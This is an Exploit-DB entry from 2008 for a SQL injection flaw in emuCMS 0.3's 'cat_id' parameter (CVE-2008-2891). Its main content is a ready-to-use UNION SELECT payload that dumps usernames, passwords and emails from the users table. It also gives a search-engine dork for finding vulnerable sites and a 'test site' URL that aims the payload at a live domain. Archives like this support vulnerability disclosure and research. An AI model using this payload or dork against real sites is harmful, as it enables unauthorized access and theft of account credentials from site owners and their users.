emuCMS 0.3 - 'cat_id' SQL Injection

EDB-ID:

5878

CVE:

2008-2891

EDB Verified:

Author:

TurkishWarriorr

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-06-20

Vulnerable App:

################################################## #######################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
################################################## #######################
Dork : Powered by emuCMS

exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--

Test Sites

http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
################################################## ########################
www.1923turk.org 
turkish-warriorr@hotmail.com

# milw0rm.com [2008-06-20]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services